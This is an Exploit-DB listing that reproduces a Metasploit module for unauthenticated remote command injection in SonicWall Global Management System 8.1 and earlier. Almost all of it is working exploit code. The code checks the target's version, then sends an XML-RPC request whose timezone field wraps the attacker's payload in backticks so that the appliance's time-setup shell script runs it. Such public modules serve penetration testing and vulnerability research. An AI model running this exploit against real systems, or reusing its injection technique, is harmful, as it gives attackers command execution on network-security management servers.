SonicWall Global Management System – XMLRPC set_time_zone Command Injection (Metasploit)

  • 作者: Metasploit
    日期: 2018-08-01
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/45124/
  • ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
    
    Rank = ExcellentRanking
    
    include Msf::Exploit::Remote::HttpClient
    
    def initialize(info={})
    super(update_info(info,
    'Name' => "SonicWall Global Management System XMLRPC
     set_time_zone Unath RCE",
    'Description' => %q{
    This module exploits a vulnerability in SonicWall Global
    Management System Virtual Appliance versions 8.1 (Build 8110.1197)
    and below. This virtual appliance can be downloaded from
    http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a
    holistic way to manage your entire network security environment.'
    
    These vulnerable versions (8.1 Build 8110.1197 and below) do not
    prevent unauthenticated, external entities from making XML-RPC
    requests to port 21009 of the virtual app. After the XML-RPC call
    is made, a shell script is called like so:
    'timeSetup.sh --tz="`command injection here`"' --usentp="blah"'.
    },
    'License' => MSF_LICENSE,
    'Author' => [ 'Michael Flanders', #MSF Module
    'kernelsmith' #Advisor
    ],
    'References' => [
    ['URL', 'https://www.digitaldefense.com/digital-defense/vrt-discoveries/'],
    ['URL', 'https://slides.com/kernelsmith/bsidesaustin2018/#/']
    ],
    'Platform' => [ 'unix' ],
    'Arch' => ARCH_CMD,
    'Targets' => [
    [ 'SonicWall Global Management System Virtual Appliance', {} ],
    ],
    'Payload' => {
    # Can't use ampersand, Java's XML-RPC parser will complain and return an error
    'BadChars' => "\x26",
     'Compat' => {
     'PayloadType' => 'cmd',
     'RequiredCmd' => 'generic bash telnet'
     }
    },
    'DisclosureDate' => "Jul 22 2016",
    'DefaultTarget' => 0))
    
    register_options(
    [
    OptString.new('WEB_SERVER_PORT', [ false, 'Port of web console login page.
     Defaults to 80/443 depending on SSL.'])
    ])
    end
    
    def check
    if datastore['WEB_SERVER_PORT']
    port_number = datastore['WEB_SERVER_PORT']
    else
    port_number = datastore['SSL'] ? '443' : '80'
    end
    
    handler = datastore['SSL'] ? 'https' : 'http'
    
    res = request_url("#{handler}://#{rhost}:#{port_number}")
    
    unless res
    vprint_error 'Connection failed'
    return CheckCode::Unknown
    end
    
    unless res.code == 200 && res.body =~ /<TITLE>.+v(\d\.\d)/
    return CheckCode::Safe
    end
    
    version = Gem::Version.new $1.to_s
    
    unless version <= Gem::Version.new('8.1')
    return CheckCode::Safe
    end
    
    CheckCode::Appears
    end
    
    def exploit
    unless check == CheckCode::Appears
    fail_with Failure::NotVulnerable, "The target is not vulnerable."
    end
    
    print_status "The target appears to be vulnerable, continuing exploit..."
    send_xml
    end
    
    def send_xml
    xml_body = <<~HERESTRING
    <?xml version="1.0" encoding="UTF-8"?>
    <methodCall>
    <methodName>set_time_config</methodName>
    <params>
    <param>
    <value>
    <struct>
    <member>
    <name>timezone</name>
    <value>
    <string>"`#{payload.encoded}`"</string>
    </value>
    </member>
    </struct>
    </value>
    </param>
    </params>
    </methodCall>
    HERESTRING
    
    res = send_request_raw({
    'method'=> 'POST',
    'uri' => '/',
    'data'=> xml_body,
    'ctype' => 'text/xml; charset=UTF-8'
    })
    
    unless res && res.body.include?("success")
    print_error("Error sending XML to #{rhost}:#{rport}")
    end
    end
    
    end